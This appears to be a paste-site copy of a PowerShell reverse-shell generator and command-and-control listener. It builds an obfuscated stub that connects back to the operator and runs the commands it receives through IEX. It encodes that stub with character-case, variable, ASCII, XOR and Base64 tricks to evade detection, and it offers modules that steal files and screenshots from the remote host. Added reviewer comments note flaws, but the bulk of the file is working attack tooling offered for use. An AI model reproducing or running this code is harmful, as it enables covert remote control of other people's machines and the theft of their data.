syst3m_h4x0r

Reverse TCP .ps1

Jan 4th, 2020
# Randomly upper-/lower-cases every character of $String and returns the
# result. PowerShell keywords, cmdlets, operators, type names and automatic
# variables are case-insensitive, which is why the generated stubs still run.
# Every caller in this file applies it to a code template BEFORE Base64 text,
# byte lists, keys or file names are spliced in (those would not survive
# case flipping).
# Security note: this only defeats case-sensitive literal matching; the token
# stream is unchanged and what IEX eventually executes is the same code.
function Character_Obfuscation($String)
{
    $String = $String.toCharArray();

    Foreach($Letter in $String)
    {
        # Coin flip per character: 1 -> lower-case, 2 -> upper-case.
        $RandomNumber = (1..2) | Get-Random;

        If($RandomNumber -eq "1")
        {
            $Letter = "$Letter".ToLower();
        }

        If($RandomNumber -eq "2")
        {
            $Letter = "$Letter".ToUpper();
        }

        # NOTE(review): $RandomString is never initialised in this function, so
        # the first += appears to start from whatever the calling scope holds
        # (normally $null, which concatenates to ""). Nothing in this file sets
        # $RandomString in a caller's scope, but `$RandomString = ''` before
        # the loop would make the accumulator explicit.
        $RandomString += $Letter;
        $RandomNumber = $Null;
    }

    $String = $RandomString;
    Return $String;
}
  26.  
# Replaces the placeholder variables $1 .. $100 in a generated PowerShell
# string with random five-letter names so that each emitted stub uses
# different identifiers (the templates in this file only use $1 .. $9).
# Returns the rewritten string; text without $<digits> comes back unchanged.
function Variable_Obfuscation($String)
{
    # Slot i will hold the replacement name for $(i+1); starts out as 0..99.
    $RandomVariable = (0..99);

    For($i = 0; $i -lt $RandomVariable.count; $i++)
    {
        # Five distinct letters from A-Z / a-z (Get-Random -Count draws
        # without replacement).
        $Temp = (-Join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_}));

        # Redraw while the name is already in the table (an array on the left
        # of -like yields the matching elements, i.e. non-empty on a duplicate).
        # NOTE(review): there is no check against PowerShell automatic
        # variables; "input" and "false" are five distinct letters and would
        # break the stub if ever drawn (negligible probability, not zero).
        While($RandomVariable -like "$Temp")
        {
            $Temp = (-Join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_}));
        }

        $RandomVariable[$i] = $Temp;
        $Temp = $Null;
    }

    $RandomString = $String;

    # Walk from $100 down to $1 so the pattern for $1 cannot match the prefix
    # of $10..$19 (and so on) before those have already been replaced.
    For($x = $RandomVariable.count; $x -ge 1; $x--)
    {
        $Temp = $RandomVariable[$x-1];
        # Pattern "\`$$x" expands to the regex \$<n>; replacement "`$$Temp"
        # to the literal $<name>.
        $RandomString = "$RandomString" -replace "\`$$x", "`$$Temp";
    }

    $String = $RandomString;
    Return $String;
}
  55.  
# Wraps an already-generated payload as a list of decimal ASCII byte values
# that the stub turns back into characters with [char] and runs through IEX.
# Returns a two-element array: [0] a PowerShell one-liner, [1] a cmd.exe
# one-liner that ECHOes the same text into  PowerShell "IEX(IEX($input))"
# (that command line, with the payload arriving on stdin, is what a process
# log will show for the cmd variant).
# Security note: this is an encoding, not encryption -- converting the numbers
# back to characters recovers the original text.
function ASCII_Obfuscation($String)
{
    # "@" is the placeholder for the byte list. In $CMD the "`$_" must survive
    # cmd's ECHO and the first IEX, hence the extra layer of backtick escaping.
    $PowerShell = "IEX(-Join((@)|%{[char]`$_}));Exit";
    $CMD = "ECHO `"IEX(-Join((@)|%{[char]```$_}));Exit`" | PowerShell `"IEX(IEX(`$input))`"&Exit";

    # Comma-separated decimal byte values of the payload (ASCII encoder: any
    # non-ASCII character in the input would not round-trip).
    $String = [System.Text.Encoding]::ASCII.GetBytes($String) -join ',';

    # Case-flip the wrapper first, then splice in the byte list; the list
    # contains no "@", so the single regex -replace cannot collide with it.
    $PowerShell = Character_Obfuscation($PowerShell);
    $PowerShell = $PowerShell -replace "@","$String";

    $CMD = Character_Obfuscation($CMD);
    $CMD = $CMD -replace "@","$String";

    Return $PowerShell,$CMD;
}
  71.  
# Wraps a generated payload as Base64 text. Returns [PowerShell one-liner,
# cmd.exe one-liner] like ASCII_Obfuscation. Placeholders: "@" = the Base64
# text, "#" = the Get-Random seed. The Base64 text is placed inside {...} --
# a script block whose string form appears to be its own text -- so that no
# quoting is needed inside the wrapper.
#
# NOTE(review): the "shuffle" is suspect. Each Sort-Object key evaluates
# `Get-Random -SetSeed <seed>`, which re-seeds on every call, so every element
# gets the same key. With a stable Sort-Object the order is unchanged on both
# sides and this is plain Base64 (decodable by anyone); with an unstable sort
# the permutation is implementation-defined and the stub is not guaranteed to
# invert it. Either way the seed is written into the stub in clear.
function Base64_Obfuscation($String)
{
    $PowerShell = "IEX([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String(([Text.Encoding]::ASCII.GetString(([Text.Encoding]::ASCII.GetBytes({@})|Sort-Object {Get-Random -SetSeed #}))))));Exit";
    $CMD = "ECHO `"IEX([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String(([Text.Encoding]::ASCII.GetString(([Text.Encoding]::ASCII.GetBytes({@})|Sort-Object {Get-Random -SetSeed #}))))));Exit`" | PowerShell `"IEX(IEX(`$input))`"&Exit";

    # Nine-digit, zero-padded seed shared by the generator and the stub.
    $Seed = (Get-Random -Minimum 0 -Maximum 999999999).ToString('000000000');
    # Base64-encode the payload, then apply the same seeded Sort-Object the
    # stub applies (see the note above on what that actually does).
    $String = [Text.Encoding]::ASCII.GetString(([Text.Encoding]::ASCII.GetBytes([Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes($String))) | Sort-Object {Get-Random -SetSeed $Seed}));

    # Case-flip the wrapper first; Base64 text and the digit-only seed contain
    # neither "@" nor "#", so the two regex replacements cannot collide.
    $PowerShell = Character_Obfuscation($PowerShell);
    $PowerShell = $PowerShell -replace "@","$String";
    $PowerShell = $PowerShell -replace "#","$Seed";

    $CMD = Character_Obfuscation($CMD);
    $CMD = $CMD -replace "@","$String";
    $CMD = $CMD -replace "#","$Seed";

    Return $PowerShell,$CMD;
}
  90.  
# Wraps a generated payload as a list of byte values XORed with a one-byte key.
# Returns [PowerShell one-liner, cmd.exe one-liner]. Placeholders: "@" = the
# byte list, "#" = the key literal.
# Security note: the key is a single byte in 0x00..0x5F and is written into
# the stub in clear, so this is a reversible encoding, not encryption; 0x00 is
# inside the range and leaves the bytes unchanged.
function BXOR_Obfuscation($String)
{
    $PowerShell = "IEX(-Join((@)|%{[char](`$_-BXOR #)}));Exit";
    $CMD = "ECHO `"IEX(-Join((@)|%{[char](```$_-BXOR #)}));Exit`" | PowerShell `"IEX(IEX(`$input))`"&Exit";

    # Key text = "0x" + one digit 0-5 + one hex digit (0-9, A-F, a-f), i.e.
    # 0x00..0x5F -- presumably capped below 0x60 so XORed 7-bit ASCII stays
    # within 7 bits. PowerShell converts the string to an int for -BXOR.
    $Key = '0x' + ((0..5) | Get-Random) + ((0..9) + ((65..70) + (97..102) | % {[char]$_}) | Get-Random);
    # Comma-separated XORed byte values of the ASCII payload.
    $String = ([System.Text.Encoding]::ASCII.GetBytes($String) | % {$_ -BXOR $Key}) -join ',';

    # Case-flip the wrapper before splicing in the bytes and the key, so the
    # substituted text itself is not case-flipped.
    $PowerShell = Character_Obfuscation($PowerShell);
    $PowerShell = $PowerShell -replace "@","$String";
    $PowerShell = $PowerShell -replace "#","$Key";

    $CMD = Character_Obfuscation($CMD);
    $CMD = $CMD -replace "@","$String";
    $CMD = $CMD -replace "#","$Key";

    Return $PowerShell,$CMD;
}
  109.  
# Builds the (un-wrapped) reverse-shell stub that the remote host will run.
#   $IP, $Port   - the listener this script binds; spliced into a TcpClient
#                  constructor. $IP sits inside single quotes, so a value
#                  containing ' breaks the stub.
#   $Base64_Key  - Base64 of the 32-byte key the caller generated.
# Returns the stub text with randomised case and variable names.
#
# What the stub does ($1..$9 are renamed by Variable_Obfuscation):
#   $1 = 1024-byte read buffer; $2 = key decoded from "@"; $3 = the
#   ConvertFrom-SecureString blob from "#"; $4 = IEX of the decrypted
#   "New-Object System.Net.Sockets.TCPClient('<ip>',<port>)", i.e. the live
#   connection. Loop: read while data is pending or the last read filled the
#   buffer, IEX the text, capture stdout+stderr via Out-String, append a space
#   when the reply length is a multiple of 1024 (the listener uses a short
#   read as end-of-message), write it back, repeat. There is no reconnect.
#
# Security notes: the key is embedded in the same stub as the ciphertext, so
# the SecureString step only hides the literal connect string from static
# inspection -- it provides no confidentiality. Traffic is plain TCP with no
# authentication; whoever answers on <ip>:<port>, or sits on the path, can
# feed the stub commands.
function Payload($IP,$Port,$Base64_Key)
{
    $Payload = "`$1=[System.Byte[]]::CreateInstance([System.Byte],1024);`$2=([Convert]::FromBase64String(`"@`"));`$3=`"#`";`$4=IEX([System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR((`$3|ConvertTo-SecureString -Key `$2))));While(`$5=`$4.GetStream()){;While(`$5.DataAvailable -or `$6 -eq `$1.count){;`$6=`$5.Read(`$1,0,`$1.length);`$7+=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(`$1,0,`$6)};If(`$7){;`$8=(IEX(`$7)2>&1|Out-String);If(!(`$8.length%`$1.count)){;`$8+=`" `"};`$9=([text.encoding]::ASCII).GetBytes(`$8);`$5.Write(`$9,0,`$9.length);`$5.Flush();`$7=`$Null}}";

    # Encrypt the connect expression with the caller's key (AES via
    # ConvertFrom-SecureString -Key); the hex blob replaces "#" below.
    $Key = ([Convert]::FromBase64String($Base64_Key));
    $C2 = ConvertTo-SecureString "New-Object System.Net.Sockets.TCPClient('$IP',$Port)" -AsPlainText -Force | ConvertFrom-SecureString -Key $Key;

    # Obfuscate the template first, then splice in key and blob (Base64 and
    # hex text contain neither "@" nor "#", so the replacements do not clash).
    $Payload = Variable_Obfuscation(Character_Obfuscation($Payload));
    $Payload = $Payload -replace "@","$Base64_Key";
    $Payload = $Payload -replace "#","$C2";

    Return $Payload;
}
  123.  
# ---------------------------------------------------------------------------
# Script body: interactive listener and payload generator.
#
# Flow: prompt for callback host/port -> generate a random 32-byte key and
# build the stub -> wrap it with one of three encoders -> print the one-liners
# -> listen on 0.0.0.0:<port> for ONE connection -> loop: read an operator
# command, send it to the stub (which runs it through IEX), read and print
# the reply.
#
# Review notes:
#  * Transport is plain TCP, cleartext PowerShell in both directions, no
#    authentication: the first peer to connect becomes the "remote host".
#  * Message framing is heuristic -- read until nothing is pending or a read
#    returns fewer than 1024 bytes, with a space appended whenever a message
#    length is a multiple of 1024 -- not a length-prefixed protocol.
#  * The Download/Screenshot reply is evaluated with IEX on the operator's
#    own host (see NOTE(review) at that line): code execution by the peer.
# ---------------------------------------------------------------------------

# Banner plus the built-in command list (shown on start and by "Modules").
$Modules = @"


_____ _______ _____ _____ _____ _ _ _ _
| __ \ |__ __/ ____| __ \ / ____| | | | | | |
| |__) |_____ _____ _ __ ___ ___| | | | | |__) | | (___ | |__| | ___| | |
| _ // _ \ \ / / _ \ '__/ __|/ _ \ | | | | ___/ \___ \| __ |/ _ \ | |
| | \ \ __/\ V / __/ | \__ \ __/ | | |____| | ____) | | | | __/ | |
|_| \_\___| \_/ \___|_| |___/\___|_| \_____|_| |_____/|_| |_|\___|_|_|

- By: @ZHacker13

- | Modules | - Show C2-Server Modules.
- | Info | - Show Remote-Host Info.
- | Upload | - Upload File from Local-Host to Remote-Host.
- | Download | - Download File from Remote-Host to Local-Host.
- | Screenshot | - Save Screenshot from Remote-Host to Local-Host.


"@;

Clear-Host;
Write-Host $Modules;

# Address the stub will connect back to; spliced into the payload unchecked.
Write-Host " - Local Host: " -NoNewline;
$Local_Host = Read-Host;

# Re-prompt until a port is given that netstat does not already show as
# LISTENING. The parse takes the text after the first ":" (IPv4 "addr:port"
# lines). NOTE(review): an IPv6 "[::]:port" line splits differently, so a
# listener bound only on IPv6 is not detected; non-numeric input is not
# rejected here and only fails later when the TcpListener is created.
While(!($Local_Port))
{
    Write-Host " - Local Port: " -NoNewline;
    $Local_Port = Read-Host;

    netstat -na | Select-String LISTENING | % {

        If(($_.ToString().split(":")[1].split(" ")[0]) -eq "$Local_Port")
        {
            $Local_Port = $Null;
        }
    }
}

# 32 random bytes used as the ConvertFrom-SecureString key in Payload.
# NOTE(review): Get-Random -Maximum is exclusive (255 is never drawn) and
# Get-Random is not a cryptographic RNG. This hardly matters here: the Base64
# key is embedded in the stub next to the ciphertext, so it only hides the
# connect string from static inspection rather than protecting it.
$Key = (1..32 | % {[byte](Get-Random -Minimum 0 -Maximum 255)});
$Base64_Key = [Convert]::ToBase64String($Key);

Write-Host "`n [*] Generate Payload ! [*]";
Write-Host " [*] Please Wait ... [*]";

$Payload = Payload -IP $Local_Host -Port $Local_Port -Base64_Key $Base64_Key;

Write-Host " [*] Success ! [*]";
$Choices = (1..3);

# Re-prompt until the answer matches 1, 2 or 3.
# NOTE(review): -like treats the input as a wildcard pattern, so "*" or "?"
# passes this check, matches none of the If blocks below, and $Payload stays
# a single string -- $Payload[0]/[1] then yield its first two characters
# instead of the two one-liners. `$Choices -contains $Choice` is the exact
# test intended here.
While(!($Choices -like "$Choice"))
{
    Write-Host "`n [*] Obfuscation Type: [*]";

    Write-Host "`n 1 = ASCII";
    Write-Host " 2 = BXOR";
    Write-Host " 3 = Base64";

    Write-Host "`n >>> " -NoNewline;
    $Choice = Read-Host;
}

Clear-Host;
Write-Host $Modules;

Write-Host " - Local Host: $Local_Host";
Write-Host " - Local Port: $Local_Port";

# Each encoder returns [PowerShell one-liner, cmd.exe one-liner].
If($Choice -eq "1")
{
    Write-Host "`n [*] Obfuscation Type: ASCII [*]";
    $Payload = ASCII_Obfuscation($Payload);
}

If($Choice -eq "2")
{
    Write-Host "`n [*] Obfuscation Type: BXOR [*]";
    $Payload = BXOR_Obfuscation($Payload);
}

If($Choice -eq "3")
{
    Write-Host "`n [*] Obfuscation Type: Base64 [*]";
    $Payload = Base64_Obfuscation($Payload);
}

$PowerShell_Payload = $Payload[0];
$CMD_Payload = $Payload[1];

Write-Host "`n [*] PowerShell Payload: [*]`n`n$PowerShell_Payload";
Write-Host "`n [*] CMD Payload: [*]`n`n$CMD_Payload`n";

# Listener: binds every interface and accepts exactly one client; nothing
# verifies who connected, and a second client is never accepted.
$Bytes = [System.Byte[]]::CreateInstance([System.Byte],1024);
Write-Host "`n [*] Listeneing on Port `"$Local_Port`" [*]";
$Socket = New-Object System.Net.Sockets.TcpListener('0.0.0.0',$Local_Port);
$Socket.Start();
$Client = $Socket.AcceptTcpClient();
$Remote_Host = $Client.Client.RemoteEndPoint.Address.IPAddressToString;
Write-Host " [*] Connection ! `"$Remote_Host`" [*]";
Write-Host " [*] Please Wait ... [*]";
$Stream = $Client.GetStream();

# $WaitData: a command was sent and its reply is still to be read.
# $Info: the first reply (host information), cached for the "Info" command.
$WaitData = $False;
$Info = $Null;

# Case-flipped WMI expressions evaluated on the remote side.
$System = Character_Obfuscation("(Get-WmiObject Win32_OperatingSystem).Caption");
$Version = Character_Obfuscation("(Get-WmiObject Win32_OperatingSystem).Version");
$Architecture = Character_Obfuscation("(Get-WmiObject Win32_OperatingSystem).OSArchitecture");
$Name = Character_Obfuscation("(Get-WmiObject Win32_OperatingSystem).CSName");
$WindowsDirectory = Character_Obfuscation("(Get-WmiObject Win32_OperatingSystem).WindowsDirectory");

# First command, sent automatically: a string-concatenation expression whose
# result is the host summary. "``n" is sent as a literal `n so the remote
# expands the newline, not this script.
$Command = "`" - Host: `"+`"$Remote_Host`"+`"``n - System: `"+$System+`"``n - Version: `"+$Version+`"``n - Architecture: `"+$Architecture+`"``n - Name: `"+$Name+`"``n - WindowsDirectory: `"+$WindowsDirectory";

While($Client.Connected)
{
    If(!($WaitData))
    {
        If(!($Command))
        {
            Write-Host " - Command: " -NoNewline;
            $Command = Read-Host;
        }

        # Local-only commands: nothing is sent for these.
        If($Command -eq "Modules")
        {
            Write-Host "`n$Modules";
            $Command = $Null;
        }

        If($Command -eq "Info")
        {
            Write-Host "`n$Info";
            $Command = $Null;
        }

        # Screenshot: the remote draws the primary screen into a Bitmap, saves
        # it to $env:temp\<15 random letters> (no format given to Save), sends
        # the file's bytes as a comma list and deletes the temp file; the
        # reply is stored locally as <name>.png.
        If($Command -eq "Screenshot")
        {
            $File = -join ((65..90) + (97..122) | Get-Random -Count 15 | % {[char]$_});
            Write-Host "`n - Screenshot File: $File.png";
            Write-Host "`n [*] Please Wait ... [*]";
            $Command = "`$1=`"`$env:temp\#`";Add-Type -AssemblyName System.Windows.Forms;`$2=New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height);`$3=[System.Drawing.Graphics]::FromImage(`$2);`$3.CopyFromScreen((New-Object System.Drawing.Point(0,0)),(New-Object System.Drawing.Point(0,0)),`$2.Size);`$3.Dispose();`$2.Save(`"`$1`");If(([System.IO.File]::Exists(`"`$1`"))){[io.file]::ReadAllBytes(`"`$1`") -join ',';Remove-Item -Path `"`$1`" -Force}";
            $Command = Variable_Obfuscation(Character_Obfuscation($Command));
            $Command = $Command -replace "#","$File";
            $File = "$pwd\$File.png";
            $Save = $True;
        }

        # Download: remote reads the named file (relative names resolve
        # against the remote $pwd) and replies with its bytes as a comma list;
        # saved locally under the base name in this script's $pwd.
        # NOTE(review): the operator-typed name is spliced into the remote
        # command inside double quotes and via the replacement side of
        # -replace, so names containing ", $ or ` alter the command rather
        # than being passed through literally.
        If($Command -eq "Download")
        {
            Write-Host "`n - Download File: " -NoNewline;
            $File = Read-Host;

            If(!("$File" -like "* *") -and !([string]::IsNullOrEmpty($File)))
            {
                Write-Host "`n [*] Please Wait ... [*]";
                $Command = "`$1=`"#`";If(!(`"`$1`" -like `"*\*`") -and !(`"`$1`" -like `"*/*`")){`$1=`"`$pwd\`$1`"};If(([System.IO.File]::Exists(`"`$1`"))){[io.file]::ReadAllBytes(`"`$1`") -join ','}";
                $Command = Variable_Obfuscation(Character_Obfuscation($Command));
                $Command = $Command -replace "#","$File";
                $File = $File.Split('\')[-1];
                $File = $File.Split('/')[-1];
                $File = "$pwd\$File";
                $Save = $True;

            } Else {

                Write-Host "`n";
                $File = $Null;
                $Command = $Null;
            }
        }

        # Upload: the local file's bytes are embedded in the command as a
        # PowerShell array literal "(b1,b2,...)"; the remote writes it to
        # $pwd\<basename> only if that path does not exist and replies with
        # "<path> [*]" on success (an empty reply arrives as a single space).
        # Large files make the command string several times the file size.
        If($Command -eq "Upload")
        {
            Write-Host "`n - Upload File: " -NoNewline;
            $File = Read-Host;

            If(!("$File" -like "* *") -and !([string]::IsNullOrEmpty($File)))
            {
                Write-Host "`n [*] Please Wait ... [*]";

                If(!("$File" -like "*\*") -and !("$File" -like "*/*"))
                {
                    $File = "$pwd\$File";
                }

                If(([System.IO.File]::Exists("$File")))
                {
                    $FileBytes = [io.file]::ReadAllBytes("$File") -join ',';
                    $FileBytes = "($FileBytes)";
                    $File = $File.Split('\')[-1];
                    $File = $File.Split('/')[-1];
                    $Command = "`$1=`"`$pwd\#`";`$2=@;If(!([System.IO.File]::Exists(`"`$1`"))){[System.IO.File]::WriteAllBytes(`"`$1`",`$2);`"`$1 [*]`"}";
                    $Command = Variable_Obfuscation(Character_Obfuscation($Command));
                    $Command = $Command -replace "#","$File";
                    $Command = $Command -replace "@","$FileBytes";
                    $Upload = $True;

                } Else {

                    Write-Host " [*] Failed ! [*]";
                    Write-Host " [*] File Missing [*]`n";
                    $Command = $Null;
                }

            } Else {

                Write-Host "`n";
                $Command = $Null;
            }

            $File = $Null;
        }

        # Anything left in $Command (including a raw operator command, "Exit"
        # and "Clear") is sent to the remote, which executes it with IEX.
        If(!([string]::IsNullOrEmpty($Command)))
        {
            # Framing: a message must not end on a full 1024-byte read, or the
            # stub keeps waiting for more; pad with one space in that case.
            If(!($Command.length % $Bytes.count))
            {
                $Command += " ";
            }

            $SendByte = ([text.encoding]::ASCII).GetBytes($Command);

            Try {

                $Stream.Write($SendByte,0,$SendByte.length);
                $Stream.Flush();
            }

            Catch {

                Write-Host "`n [*] Connection Lost ! [*]`n";
                $Socket.Stop();
                $Client.Close();
                $Stream.Dispose();
                Exit;
            }

            $WaitData = $True;
        }

        # "Exit" was already sent above (the stub's IEX exits the remote
        # PowerShell); now tear down the local side too.
        If($Command -eq "Exit")
        {
            Write-Host "`n [*] Connection Lost ! [*]`n";
            $Socket.Stop();
            $Client.Close();
            $Stream.Dispose();
            Exit;
        }

        If($Command -eq "Clear" -or $Command -eq "Cls" -or $Command -eq "Clear-Host")
        {
            Clear-Host;
            Write-Host "`n$Modules";
        }

        $Command = $Null;
    }

    If($WaitData)
    {
        # Poll (1 ms) until the stub starts replying. There is no timeout, so a
        # long-running remote command simply keeps the operator waiting.
        While(!($Stream.DataAvailable))
        {
            Start-Sleep -Milliseconds 1;
        }

        If($Stream.DataAvailable)
        {
            # Keep reading while data is pending OR the previous read filled
            # the whole buffer (the stub pads its reply so a message never
            # ends on an exact multiple of 1024 -- see the stub in Payload).
            While($Stream.DataAvailable -or $Read -eq $Bytes.count)
            {
                Try {

                    If(!($Stream.DataAvailable))
                    {
                        # After a full buffer, allow roughly a second (1000 x
                        # 1 ms polls) for the next chunk; otherwise treat the
                        # peer as gone and shut the whole listener down.
                        $Temp = 0;

                        While(!($Stream.DataAvailable) -and $Temp -lt 1000)
                        {
                            Start-Sleep -Milliseconds 1;
                            $Temp++;
                        }

                        If(!($Stream.DataAvailable))
                        {
                            Write-Host "`n [*] Connection Lost ! [*]`n";
                            $Socket.Stop();
                            $Client.Close();
                            $Stream.Dispose();
                            Exit;
                        }
                    }

                    $Read = $Stream.Read($Bytes,0,$Bytes.length);
                    $OutPut += (New-Object -TypeName System.Text.ASCIIEncoding).GetString($Bytes,0,$Read);
                }

                Catch {

                    Write-Host "`n [*] Connection Lost ! [*]`n";
                    $Socket.Stop();
                    $Client.Close();
                    $Stream.Dispose();
                    Exit;
                }
            }

            # The very first reply is the host summary requested above.
            If(!($Info))
            {
                $Info = "$OutPut";
            }

            # A lone space is the stub's "no output" reply.
            If($OutPut -ne " " -and !($Save) -and !($Upload))
            {
                Write-Host "`n$OutPut";
            }

            If($Save)
            {
                If($OutPut -ne " ")
                {
                    If(!([System.IO.File]::Exists("$File")))
                    {
                        # NOTE(review): this evaluates whatever the peer sent
                        # as PowerShell on the operator's machine. The expected
                        # reply is a comma-separated byte list, but nothing
                        # checks that, so a hostile or hijacked peer can answer
                        # a Download/Screenshot with arbitrary code. Parse the
                        # list instead of evaluating it, e.g.
                        #   $FileBytes = [byte[]]($OutPut.Trim() -split ',');
                        $FileBytes = IEX("($OutPut)");
                        [System.IO.File]::WriteAllBytes("$File",$FileBytes);
                        Write-Host " [*] Success ! [*]";
                        Write-Host " [*] File Saved: $File [*]`n";

                    } Else {

                        Write-Host " [*] Failed ! [*]";
                        Write-Host " [*] File already Exists [*]`n";
                    }
                } Else {

                    Write-Host " [*] Failed ! [*]";
                    Write-Host " [*] File Missing [*]`n";
                }

                $File = $Null;
                $Save = $False;
            }

            If($Upload)
            {
                If($OutPut -ne " ")
                {
                    $OutPut = $OutPut -replace "`n","";
                    Write-Host " [*] Success ! [*]";
                    Write-Host " [*] File Uploaded: $OutPut`n";

                } Else {

                    Write-Host " [*] Failed ! [*]";
                    Write-Host " [*] File already Exists [*]`n";
                }

                $Upload = $False;
            }

            $WaitData = $False;
            $Read = $Null;
            $OutPut = $Null;
        }
    }
}